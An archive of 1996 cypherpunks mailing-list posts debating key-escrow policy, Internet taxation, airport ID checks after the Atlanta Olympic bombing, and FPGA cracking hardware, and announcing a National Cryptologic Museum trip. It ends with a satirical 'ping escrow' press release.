Date: Thu, 1 Aug 1996 00:40:20 +0800
To: cypherpunks@toad.com
Subject: Re: fbi, crypto, and defcon
In-Reply-To: <Pine.BSI.3.91.960730235012.21132A-100000@wichita.fn.net>
Message-ID: <Pine.LNX.3.93.960731082843.9698A-100000@daffy.fn.net>
MIME-Version: 1.0
Content-Type: text/plain



> Date: Tue, 30 Jul 1996 17:31:25 -0400
> From: Stephen Cobb <stephen@iu.net>
> To: cypherpunks@feist.com
> Subject: Re: fbi, crypto, and defcon

> Okay, so their boss is part of the law making process, subject to the checks
> and balances that exist between the three branches of US government. They
> are in a position to supply their boss with data and I am personally
> impressed with their grasp of some of that data (it sounds to me like they
> are telling their boss that hackers like the ones at Defcon are not the
> problem).

    I think what they are really saying is that they would love to
bust most hackers, but since they can't they might as well use some of
them to catch the bigger fish.  If they truly did believe in the laws they
are supposed to uphold they wouldn't associate with hackers (who commit
computer crimes) at all.

> All of us who have some understanding of these issues need to do our best to
> educate the public and the politicians, even if we have to start from the
> "See Jane hack" level (pun intended). Otherwise dumb laws will be passed and
> then we will have to engage in mass civil disobedience (which I have
> personally done in the past). Stopping bad laws from becoming law is a lot
> easier than overturning them later.

    This is exactly one good reason for having additional support for our
Hack The Lies (HTL) project.  Besides spreading truthful and factual
information to the public, we recognize that the government definately
could use its share of help from people who know what they are talking
about.
.TQDB





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 1 Aug 1996 03:49:27 +0800
To: cypherpunks@toad.com
Subject: Re:FPGAs and Heat (Re: Paranoid Musings)
Message-ID: <199607311609.JAA16248@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:14 AM 7/31/96 -0800, Jim McCoy wrote:

>The interconnection problem has also been solved in this chip series. [A
>long-standing problem with FPGAs is that there were generally a limited
>amount of "wires" running between the logic elements and thus a lot of cells
>were wasted because there were no interconnections left, I/O to the outside
>world was also a problem.]  The chip has a really cool interconnection method
>which allows a much more efficient use of the chip real estate and which
>makes the entire chip directly addresable (like regular RAM) through an
>on-chip interface module.  Given the relatively compact design in Ian and
>Dave's paper and the new chips one might even fit two or four cracking
>engines on a single FPGA.

However, I think it very unlikely that an organization like the NSA would 
bother with an FPGA to do a cracking engine.  FPGA's have substantial 
limitations, as you alluded to above, due to the need to make them "general 
purpose."  A non-field programmable Gate Array, a hard-wired chip, would 
tend to optimize the interconnections on chip including minimizing the 
delays, but not incur the full-custom costs such as the penalty for low volume.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Zerucha <root@deimos.ceddec.com>
Date: Thu, 1 Aug 1996 01:17:01 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: www.anonymizer.com
In-Reply-To: <199607260639.XAA21189@toad.com>
Message-ID: <Pine.LNX.3.93.960731094450.7900A-100000@deimos.ceddec.com>
MIME-Version: 1.0
Content-Type: text/plain


One further note is that some servers insist on having the Client identify
itself as "Mozilla" or some other Big Browser sponsored tag.  And there
may be trademark problems if you try to use one.

I suppose you could do:

Client: Mozilla 30b5 is a trademark of Netscape

and see if it lets you through (much as earlier mouse drivers said "This
is not Copyright 19xx Microsoft" with the copyright notice the correct
displacement in the driver).

zerucha@shell.portal.com
finger zerucha@jobe.portal.com for PGP key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 1 Aug 1996 05:00:21 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: SECURITY GUARD
In-Reply-To: <2.2.32.19960731151242.0087632c@panix.com>
Message-ID: <Pine.SUN.3.91.960731095526.16168C-100000@crl3.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Wed, 31 Jul 1996, Duncan Frissell wrote:

> "If the security guard did it in Atlanta, that will be the
> second US Olympics in which the only 'terrorist incident' was
> perpetrated by a security person.  I guess we should outlaw
> security at such gatherings to prevent terrorism."

Geez, I hope it was the security guard.  Apparently, he learned
about bombs (from the prevention side, at least) from police
courses, not the Internet.  I'm sure such courses give attendees
more than enough information to build their own devices.

As per Duncan's lead, I say the government should stop spreading
terrorist bomb making information via police, military and 
intelligence training.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Thu, 1 Aug 1996 05:27:52 +0800
To: "'cypherpunks@toad.com>
Subject: RE: SECURITY GUARD
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG-960731175709Z-24701@abash1.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


>From: 	Sandy Sandfort
>
>As per Duncan's lead, I say the government should stop spreading
>terrorist bomb making information via police, military and 
>intelligence training.
.............................................

Speaking of "security" and all the excitement about getting people's IDs
(two of them), inspecting everyone's packages when they board planes,
etc. --

It has been mentioned in the news that there was a warning call to 911
about 30 minutes or so before the blast.   But "it didn't get to" the
right people until it was too late for them to do much about it.  

There have been many other instances where the police or other security
personnel have been been sent notice that there was a bomb or other such
device to be on the alert for, but the warnings went unheeded.   Or as
in this case, the message "didn't get to" anyone in time.

So I was thinking that it makes a joke of the need for telephone
wiretapping to catch certain criminals and their dastardly plots, when
warnings go unheeded or the security departments themselves are totally
unprepared to respond appropriately in an emergency (also in the case of
a lone pipe-bomber, there wouldn't be any conspirators making calls to
coordinate the event).

Furthermore, checking on the security guard's ID didn't prevent the bomb
from going off and killing a couple of people.   And knowing that no
one's baggage in a plane contains explosives doesn't prevent some
imaginative loon from using other ways to create havoc & destruction -
from *outside* the plane or the building in which all those clean,
examined people are sitting.

Just more ironic notes on the issue of the needs of law enforcement and
our "national security".

   ..
>Blanc
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@netapp.com (Dave Koontz)
Date: Thu, 1 Aug 1996 05:53:09 +0800
To: jya@pipeline.com
Subject: Re:  CPC_ode
Message-ID: <9607311801.AA02720@lada>
MIME-Version: 1.0
Content-Type: text/plain


thanks




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Thu, 1 Aug 1996 07:29:10 +0800
To: forsvunnet@alpha.c2.org
Subject: Re: New Clinton (anti-) Encryption Policy nnn
In-Reply-To: <199607310252.TAA21457@infinity.c2.org>
Message-ID: <199607311807.LAA08708@server1.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain



> It is for these reasons that we oppose the legislation (S. 1726)
> introduced in this Congress by Senator Burns and co-sponsored by
> Senator Lott and former Senator Dole.
          ^^^^                    ^^^^

Me thinks this is an attempt to associate this bill with the Republicans
("the other party did it!").

> the bill is unbalanced and makes no effort to take into account
  ^^^^^^^^^^^^^^^^^^^^^^

Another P.O.S. rhetoric.  ("emerging concensus", etc ...)

> The administration's proposed approach is broadly consistent with
> industry suggestions and the  conclusions reached by the National
> Academy of Sciences in its report.

Amazing!  Then why did the report conclude that key escrow should
NOT be forced upon the unsuspecting public?

> (We do not agree with the report's recommendation that we eliminate
> most controls on 56-bit key length products.)

Obviously.  Why?  I find this level of pure and arbitrary assertions
very distasteful.  If one can get away with making random assertions,
then one is not really responsible to the American public.

> Finally, we agree that key escrow is a promising but not fully
> tested solution, and are promoting the kinds of testing the report
> recommends as a way of demonstrating the solution's viability while
> providing stronger encryption internationally.

Yes, let's force the public to test it for us.  Which is what the
report recommended AGAINST.  Of course, once it is in place, it is
the standard.  Oh my god!  How did THAT happen?

> We will continue discussions with industry, other members of the
> private sector, the Congress,  and governments at all levels to
> arrive at a solution that promotes a future of safe computing in a
> safe society.

Bull shit.  Every discussion has been:  "Key escrow?"  "NO!"  "Key
escrow?"  "NO!!"  "Key escrow?"  "NO!!!"  "Key escrow?"  "NO!!!!" ...

> Supporters of the bill and administration officials opposed to it
> differed not only about interpreting  the facts but also about the
> facts themselves.

THERE is an understatement if I ever heard one ...

Sick of this P.O.S.

Ern






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 1 Aug 1996 02:46:38 +0800
To: "Richard Martin" <cypherpunks@toad.com
Subject: Re: Smart cards "a giant leap backwards" - Canadian Privacy Commissioner
Message-ID: <2.2.32.19960731151218.0086fed0@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:23 PM 7/30/96 -0400, Richard Martin wrote:
>Very little that might be new or enlightening to the world; attendees
>of CFP '96 will remember [fuzzily, in my case] the closest thing to
>Bruce's counterpart in the states admitting that the USA doesn't actually
>have much of a counterpart to the privacy commissioner.

Most Central European countries have both privacy commissioners and legal
requirements that everyone register their addresses with the police.  I'll
do without the former if I can also avoid the latter.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 1 Aug 1996 03:06:54 +0800
To: Greg Broiles <mpd@netcom.com (Mike Duvos)
Subject: Re: A Libertine Question
Message-ID: <2.2.32.19960731151242.0087632c@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:01 AM 7/31/96 -0700, Greg Broiles wrote:
>Which is a long way to say that street cops
>don't usually torment people with nice cars and/or houses, so those folks
>don't need to be so concerned about making sure their "papers" are "in
>order". 

Most demands for ID and conformations with police involve the operation of
motor vehicles.  I have never been "IDed" except at border crossings and
when I was operating motor vehicles.  Clean and dressed up people are rarely
IDed on foot.  Maybe you should mention some of the specific practices in
Seattle that disturb you.

>So the unconstitutional and oppressive character of the various laws
>Mike Duvos refers to is mitigated by their lack of evenhanded enforcement.
>If a cop can demand ID from someone who "looks like he doesn't belong here"
>he can demand it from you. (modulo driving, this isn't legal. But give
>Justice [sic] Rehnquist and Clinton and random congressional maniacs a few
>more years and see where things stand.)

Or flying on a commercial flight.  So far, prosecutions for "failure to
possess ID" have not succeeded.  You *can* be prosecuted for failure to
identify yourself (which is *not* the same thing).  The Philadelphia airport
was allegedly requiring *two* pieces of ID for flights.  If they are talking
about two pieces of photo -- government-issued ID, I wonder where the 80% of
Americans without a Passport (x the 90% of Americans who are not government
employees) get the second piece of ID. [Is it a violation of something if
you Heil Hitler od Sieg Heil the airline clerk when they ask to see your ID.
It's not a threat, it's an expression of honor.]

>with guns or other weapons. And just as some people "don't have a right to
>live in Seattle" if they won't toe the line, other people may find they
>"don't have a right to live in the United States." * 

The Supremes outlawed exile as a punishment in a case during the 1950s.
Said it was cruel and unusual punishment.  Guess it's OK to execute people
but not deprive them of having a government.

DCF

"If the security guard did it in Atlanta, that will be the second US
Olympics in which the only 'terrorist incident' was perpetrated by a
security person.  I guess we should outlaw security at such gatherings to
prevent terrorism."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@rpcp.mit.edu>
Date: Thu, 1 Aug 1996 03:12:50 +0800
To: cypherpunks@toad.com
Subject: ****Tacoma, Washington Starts Taxing Internet Access 07/30/96
Message-ID: <199607311533.LAA05116@mccannerick-bh.mccann.com>
MIME-Version: 1.0
Content-Type: text/plain


  	  				 
>WASHINGTON, DC, U.S.A., 1996 JUL 30 (NB) -- By Bill Pietrucha.  
>Tacoma, Washington, has just gained the distinction of being the 
>only municipality in the United States to tax Internet Access 
>providers (IAPs) like telephone service providers. 
>
>The city of Tacoma has extended its six percent gross receipts tax on  
>telecommunications services to include Internet services, Information 
>Technology Association of America (ITAA) spokesperson Bob Cohen 
>told Newsbytes. 
>
>"IAPs use telephone lines to provide consumers with the `on-ramp'  
>access to the Internet," Cohen told Newsbytes. "Since consumers and 
>providers already pay taxes on basic telephone service," Cohen said, 
>"the new Tacoma tax would amount to double taxation, applying to 
>both the telephone service and the content transmitted over the 
>telephone line." 
>
>Cohen said ITAA has called on Tacoma Mayor Brian Ebersole to rescind  
>the new tax, saying that "excessive regulation and taxation will 
>change the fundamental nature of this new medium (the Internet)." 
>
>In urging the mayor to stop the city's attempt to impose a tax on  
>the IAPs, ITAA President Harris N. Miler said that "Tacoma will be 
>hurting both the Internet and its own economic future." 
>
>Miller told Newsbytes that the tax will mean "a loss of profits  
>to Tacoma-based IAPs, as well as a paperwork nightmare which may 
>drive companies out of business. IAPs doing business in Tacoma will 
>be at a competitive disadvantage to their competitors in other 
>municipalities." 
>
>Miller noted that the tax regime could cause Tacoma-based IAPs to  
>move to other jurisdictions, "taking the jobs they provide, and the 
>taxes they currently pay, with them. They (IAPs) may also decide not 
>to provide service to Tacoma residents rather than deal with the 
>administrative nightmare of complying with the new tax regulations," 
>Miller said. 
>
>If other cities attempted to follow Tacoma's lead in taxing IAPs,  
>Miler said, it could cause the "Balkanization of the Internet, a 
>hodgepodge of confusing, conflicting, and difficult to administer 
>Internet tax rules and regulations. 
>
>Miller also hinted that the tax could inadvertently be in violation  
>of international tax treaties. 
>
>"To begin taxing at the local level before it is clear what the  
>impact will be on industry and the public in general is bad public 
>policy," Miller said. 
>
>(19960730/Press Contact: Bob Cohen, Information Technology  
>Association of America, 703-284-5333, Internet e-mail bcohen@itaa.org) 
>  	   	
>
>
_______________________
Regards,            There are no facts, only interpretations. -Friedrich
Nietzsche
Joseph  Reagle      http://rpcp.mit.edu/~reagle/home.html
reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 1 Aug 1996 04:41:42 +0800
To: cypherpunks@toad.com
Subject: ****Tacoma, Washington Starts Taxing Internet Access 07/30/96 (fwd)
Message-ID: <199607311655.LAA05835@einstein>
MIME-Version: 1.0
Content-Type: text



Hi all,

Forwarded message:

> Date: Wed, 31 Jul 1996 11:26:59 -0400
> From: "Joseph M. Reagle Jr." <reagle@rpcp.mit.edu>
> Subject: ****Tacoma, Washington Starts Taxing Internet Access 07/30/96
>   	  				 
> >WASHINGTON, DC, U.S.A., 1996 JUL 30 (NB) -- By Bill Pietrucha.  
> >Tacoma, Washington, has just gained the distinction of being the 
> >only municipality in the United States to tax Internet Access 
> >providers (IAPs) like telephone service providers. 
> >

Somebody needs to do their homework. Austin, TX has been taxing ISP's
for at least a year now. A recent Internet Provider meeting on this
issue resulted in a return to ISP's of a goodly amound of their taxes
because of various issues (read that I didn't go to meeting, I don't run an
ISP but a SOHO consultancy w/ Internet services).

> >The city of Tacoma has extended its six percent gross receipts tax on  
> >telecommunications services to include Internet services, Information 
> >Technology Association of America (ITAA) spokesperson Bob Cohen 
> >told Newsbytes. 

I have to pay the state 8.25% interest on any funds my customers deliver
to me.

> >If other cities attempted to follow Tacoma's lead in taxing IAPs,  
> >Miler said, it could cause the "Balkanization of the Internet, a 
> >hodgepodge of confusing, conflicting, and difficult to administer 
> >Internet tax rules and regulations. 

Agreed.

                                                       Jim Choate






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Rosoff <drosoff@ARC.unm.EDU>
Date: Thu, 1 Aug 1996 07:18:06 +0800
To: cypherpunks@toad.com
Subject: Violation or Protection? [OLYMPICS]
Message-ID: <1.5.4.16.19960731180315.3c17b63c@arc.unm.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I don't have any crypto references, but due to the Libertarian overtones
on this list I believe it is on-topic enough.

On the local news I saw footage of a couple schmoozing in the Olympic
(Centennial?) Park after its reopening. The voice-over said that all
bags are being searched, and the couple said that rather than be
alarmed or nervous, they "appreciated" it.

I'm not quite sure what to think about this. I don't have enough
experience to form a well thought-out opinion. I'd like to hear some
of everyone's thoughts on this: Is this bag-searching a violation,
(which was my immediate reaction) or is it not, because you have to
already be going into the controlled area to get searched?

Thanks for your help.

===============================================================================
David Rosoff (nihongo ga sukoshi dekiru)  --------------->  drosoff@arc.unm.edu
PGP public key 0xD37692F9 -----> finger drosoff@acoma.arc.unm.edu or keyservers
0xD37692F9  Key fingerprint =  25 7D AA 01 85 41 43 89  50 5A 33 76 F1 F1 99 67
Do you know who's reading your email? ---> http://www.arc.unm.edu/~drosoff/pgp/
Is it a forgery? --- I have PGP signed all email and news posts since May 1996.
===============================================================================
"Relax. It's not a real alarm. They can't crack _Pentagon_ codes. Can they?" :p

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMf7oqBguzHDTdpL5AQEtkQP8DjGWrL2n4V0C+Uz+S2adprh3QlXpEBhj
xQEPH70mTIYT/iNSvuPQqWtmedlssa0f2A+ziAGPV/DFGTQnACflgcSy3okZVq64
QeuAYx3sDk230FI5vOKXwMPZt3cGwaaVpLwZhc1MkjuSgZwkE9T39JlS1worPGNQ
iGkZ8Bp2ZlY=
=FEjP
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Rosoff <drosoff@ARC.unm.EDU>
Date: Thu, 1 Aug 1996 06:59:19 +0800
To: jim bell <cypherpunks@toad.com
Subject: Re: You know it's getting late when...
Message-ID: <1.5.4.16.19960731180321.3c17237e@arc.unm.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 10.41 AM 7/30/96 -0800, jim bell wrote:

>If anyone out there still doubts that the time for my "Assassination 
>Politics" idea will never come, I claim that it's later than you think.

No, I'm fairly sure that it will never come. :) 

===============================================================================
David Rosoff (nihongo ga sukoshi dekiru)  --------------->  drosoff@arc.unm.edu
PGP public key 0xD37692F9 -----> finger drosoff@acoma.arc.unm.edu or keyservers
0xD37692F9  Key fingerprint =  25 7D AA 01 85 41 43 89  50 5A 33 76 F1 F1 99 67
Do you know who's reading your email? ---> http://www.arc.unm.edu/~drosoff/pgp/
Is it a forgery? --- I have PGP signed all email and news posts since May 1996.
===============================================================================
"Relax. It's not a real alarm. They can't crack _Pentagon_ codes. Can they?" :p

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMf7oEBguzHDTdpL5AQHOPgP+PAHGvrHhQ9SBTY76dA9gYEflvGHqXKJx
/NwFn+kwg/ZHxIcyYXdiLWmKIMmEuUMxyPfJaZ/OVhqqEUGqU11LpviflJp1u42B
eNoMaugwybfaB3XM+k3WKieJB3Fekj29bYHXuhD1h9VNndTeX016MtR/rHeEM43u
oCjX2BrjDsQ=
=R+wB
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 1 Aug 1996 07:16:19 +0800
To: cypherpunks@toad.com
Subject: Re: ANNOUNCE: 2nd trip to National Cryptologic Museum
Message-ID: <ae25000003021004f928@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:15 PM 7/31/96, Zorak Ramone wrote:

>        Following the lecture, we will be going over to Henckles (10 minutes
>from the museum), a local resturaunt reported to be a favorite hangout for
>NSA employees.  Henckles has amazing sandwiches as well as good beer on tap.

Jeez, first they tap our phones, and now they're tapping our beer!


--Klaus






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Rosoff <drosoff@ARC.unm.EDU>
Date: Thu, 1 Aug 1996 07:41:45 +0800
To: cypherpunks@toad.com
Subject: Re: Reuter on P8 Anti-Terrorism
Message-ID: <1.5.4.16.19960731182851.3c47542e@arc.unm.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 12.59 AM 7/31/96 GMT, John Young wrote:

>   G7, Russia adopt anti-terror pact, avoid sanctions 
>   Date: Tue, 30 Jul 1996 10:00:07 PDT 
> 
> 
>   PARIS (Reuter) - The world's major powers closed ranks to  
>   combat terrorism Tuesday, urging other nations to join 
>   forces with them but sidestepping a dispute over U.S. 
>   demands for sanctions against what Washington calls 
>   "terrorist states." 

[...]

>   The ministers also vowed to prevent extremists from using  
>   the Internet computer network to plan attacks and spread  
>   bomb-making instructions. 
> 
> 
>   Participants heard Canadian Foreign Minister Lloyd Axworthy  
>   recount how his 11-year-old son had shown him where to find 
>   such content on the Internet. 

That damn Alta Vista. We should have had it outlawed years ago.
"If searching is outlawed, only outlaws will do searches."

===============================================================================
David Rosoff (nihongo ga sukoshi dekiru)  --------------->  drosoff@arc.unm.edu
PGP public key 0xD37692F9 -----> finger drosoff@acoma.arc.unm.edu or keyservers
0xD37692F9  Key fingerprint =  25 7D AA 01 85 41 43 89  50 5A 33 76 F1 F1 99 67
Do you know who's reading your email? ---> http://www.arc.unm.edu/~drosoff/pgp/
Is it a forgery? --- I have PGP signed all email and news posts since May 1996.
===============================================================================
"Relax. It's not a real alarm. They can't crack _Pentagon_ codes. Can they?" :p

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMf+h4hguzHDTdpL5AQFveQP9GVX6xOLl5gFcwGP4NGBLKOBGTiphul0Z
wqv+Tk7fpOvR66jg3xcl5Bhvmjx1oVaXQQnPPt39/R8vOBzD1HXcvnknRf4uhO7z
xp06KZPeKf1V9MA8E1wzRJnifi2EBQEBcj5AzjHBtgN+gLZ3KhMpmguq+kZTxpa4
+TXozx5CrxQ=
=RNL9
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 1 Aug 1996 04:07:30 +0800
To: cypherpunks@toad.com
Subject: If you have Fortezza experience
Message-ID: <9607311634.AA21048@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


Please excuse the interruption.  If you have experience building software
that uses the Fortezza card, Murray Mazer at OSF would like to chat --
he's trying to scope out what would be involved in adding it to some
WWW work for an ARPA project.  (Yes, we already have the various Lock-step,
etc., documents from the NSA.)

Please respond to Murray directly.  By way of penance for sending email
to a list that I am not on, I offer a short page on exporting crypto
software, http://www.osf.org/crypto-export.html, that some might find useful.
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: William Knowles <erehwon@c2.org>
Date: Thu, 1 Aug 1996 08:11:40 +0800
To: Duncan Frissell <tcmay@got.net>
Subject: Re: Photo IDs (Re: A Libertine Question)
In-Reply-To: <Pine.BSD.3.92.960731145113.24906B-100000@miso.wwa.com>
Message-ID: <Pine.SUN.3.94.960731125431.29007C-100000@infinity.c2.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 31 Jul 1996, Duncan Frissell wrote:

> At 02:56 AM 8/1/96 -0700, Timothy C. May wrote:
> >I can easily make my own photo I.D.s, or even order "fake I.D.s" from
> >various mail-order outlets advertising in the Usual Places. If I show up at
> >the airline with two photo I.D.s, one showing me to be "Security Officer
> >Mickey Mouse" and the other showing me to be "Mickey Mouse, Internal
> >Security Agency," will I be violating any laws?
> >
> >--Mickey Mouse (I just changed my name--if you don't like it, FAA, fuck off)
> 
> They want "government-issued" photo ID.  They haven't said which government
> have they.  Time to get my Barbados driver's license.

What about one of those camouflage passports from Britsh Honduras
that they sell in the back of the Robb Report for $300? 

I personally doubt that your basic $4.75 an hour airport security 
guard knows about that.


William Knowles
erehwon@c2.org


--
William Knowles    <erehwon@c2.org>
PGP mail welcome & prefered / KeyID 1024/2C34BCF9
PGP Fingerprint 55 0C 78 3C C9 C4 44 DE   5A 3C B4 60 9C 00 FB BD
Finger for public key
--






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zorak Ramone <kelli@tiger.towson.edu>
Date: Thu, 1 Aug 1996 05:43:02 +0800
To: cypherpunks@toad.com
Subject: ANNOUNCE: 2nd trip to National Cryptologic Museum
Message-ID: <Pine.SGI.3.93.960731125850.21865A-100000@tiger.towson.edu>
MIME-Version: 1.0
Content-Type: text/plain



-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

         The DC Cypherpunks are pleased to announce our second (annual?)

			National Cryptologic Museum 
				Field Trip
			
				(and lunch)
		    
		    Featuring a talk on the Enigma cipher 

			   Co-sponsored by DC-SAGE

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 

What:  A gathering of folks at the National Cryptologic Museum for a day 
      of exploration, education, and general schmoozing.

Who:  Cypherpunks, coderpunks, crypto enthusiasts, computer 
      nerds, crypto liberationists/crypto anarchists, system administrators, 
      political activists, hackers, rug-chewing wannabes, and Digex 
      employees.  Not forgetting Feebs, Case Officers, ATF Agents, and 
      Counter-Intel Specialists.

When:  Saturday, August 10, 1996, 11am

Where:  The National Cryptologic Museum, Ft Meade, MD (just outside 
	Washington DC, about 1/2 hr from Baltimore)

Why:  To give us a chance to catch up on things in a relaxed and 
      stimulating environment, as well as give those who didn't get to
      come along last time a second try.


General Information:

	The National Cryptologic Museum is located on Ft. Meade (NSA 
National Headquarters) and is dedicated to educating the public about the 
history of cryptography.  The majority of the museum's exhibits pertain to 
cryptanalysis during WWII, with special attention given to the Enigma system.
	Immediately following the museum tour, which may take
approximately 1 hour, a talk on Enigma will be given by cryptographer Carl
Ellison (cme@cybercash.com).  The talk will take place in the museum's
conference room.
	Following the lecture, we will be going over to Henckles (10 minutes
from the museum), a local resturaunt reported to be a favorite hangout for
NSA employees.  Henckles has amazing sandwiches as well as good beer on tap.

	Further information on the National Cryptologic museum, as well as a 
pretty good map to the museum can be found on their web site at URL 
http://www.nsa.gov:8080/museum/.

	If you would like more information about DCCP, please see our web page 
at http://www.isse.gmu.edu/~pfarrell/dccp/index.html.  Otherwise, you can 
send email to Kathleen Ellis (auntie@thunderdome.goucher.edu).

	This year's gathering promises an even greater attendance than
last year's, and we anticipate a great time for everyone.  Please post
this announcement anywhere you feel relevant and invite some friends
along!

DIRECTIONS:

The following is adapted from the NCM web page.
   
If you're coming from ...

   Baltimore, MD
          Take the B/W Parkway (Rt. 295) South towards Washington, D.C.
          Exit at Rt. 32, heading towards Ft. Meade. Before you reach the
          first light, make a left onto Colony 7 Rd. Go past the Shell
          station to reach the Museum.
          
   Washington, D.C.
          Take the B/W Parkway (Rt. 295) North towards Baltimore. Take
          the exit for Rt. 32. When you reach the light at the end of the
          exit ramp, make a left, towards Columbia. Take the first right,
          onto Colony 7 Rd. Go past the Shell station to reach the
          Museum.
          
   Annapolis, MD
          Take Rt. 32 towards Columbia. Go past NSA, and take the first
          right after Canine Rd., onto Colony 7 Rd. Go past the Shell
          station to reach the Museum.
          
   Laurel, MD
          Take Rt. 198 towards Ft. Meade. Make a left onto Rt. 32,
          heading towards Columbia. Go past NSA, and take the first right
          after Canine Rd., onto Colony 7 Rd. Go past the Shell station
          to reach the Museum.
          
   Columbia, MD
          Take Rt. 32 towards Annapolis. Take the first left after
          crossing the B/W Parkway (Rt. 295) onto Colony 7 Rd. Go past
          the Shell station to reach the Museum.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Thu, 1 Aug 1996 09:25:09 +0800
To: cypherpunks@toad.com
Subject: New Clinton Administration Ping Policy
Message-ID: <199607312022.NAA09240@server1.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain



Press release:

CLINTON ADMINISTRATION FACT SHEET: U.S. PING POLICY
(Industry, international cooperation urged)

WASHINGTON -- Because advanced network technology is posing serious
national security threats to computer systems in the financial
industry and other critical sectors of the economy, the Clinton
administration is pressing for a global system for identifying the
source of the network threat when necessary.

An July 30 fact sheet from the U.S. Department of Commerce elaborates
the administration approach, called ping recovery escrow.

While the United States sets no limit on the level of number of pings
that networked systems may send within local area networks, it does
restrict exports of ping packets outside LANs.  The administration
says it might relax those export controls if U.S. industry cooperates
on building a ping recovery infrastructure.

Following is the text of the fact sheet:

(begin text)

U.S. Cryptography Policy:  Why We Are Taking the Current Approach

We live in an age of electronic information.  Network technology is
transforming society, creating new businesses, new jobs and new
careers.  The technology also creates new opportunities for network-
enabled systems in critical sectors of the economy such as financial,
military, or government systems.  As a result, these systems are
extremely vulnerable to anonymous security breaches via standard
Internet connections.

The United States is the world leader in networking technology.  U.S.
firms continue to dominate the U.S. and global information systems
market.  Retaining this leadership is important to our economic
security.  The Clinton administration, through its National
Information Infrastructure initiative, has long recognized that
government has an important role as a facilitator and catalyst for
the industry-led transformation of the way we use computer and
communications technology to work and live.

In particular, government has a strong interest in promoting the
legitimate use of robust ping technology to support U.S. international
competitiveness, foster global electronic commerce, prevent computer
crime, and ensure that the information superhighway is a safe place to
conduct one's business.  At the same time, there is a growing
recognition, affirmed most recently by Congressional studies of network
security that computers everywhere are being attacked via the global
Internet.

We must recognize that the stability and the intregrity of these
critical systems are vital to the national security interests of the
United States.

The importance of the U.S. information technology industry, the security
stakes, and increasing congressional interest make it clear that there
is an urgent need for clear policy and direction.   The administration's
proposed approach is broadly consistent with industry suggestions.  We
believe the right balance must be struck between network technology and
national security.

Effective immediately, the Department of State will transfer its export
control authority over ping technology to the Department of Commerce.
The procedures for one time review by the National Security Agency will
remain in place.  Controls on ping packets exports from local area
networks will be relaxed immediately to certain non-critical sectors of
the Internet, provided that packet lengths longer than 40 bits are
properly escrowed for law enforcement recovery.

We will continue discussions with industry, other members of the private
sector, the Congress,  and governments at all levels to arrive at a
solution that promotes a future of safe networking in a safe society.

(end text)

--------

Just can't wait until 4/1 for this one.

Ern






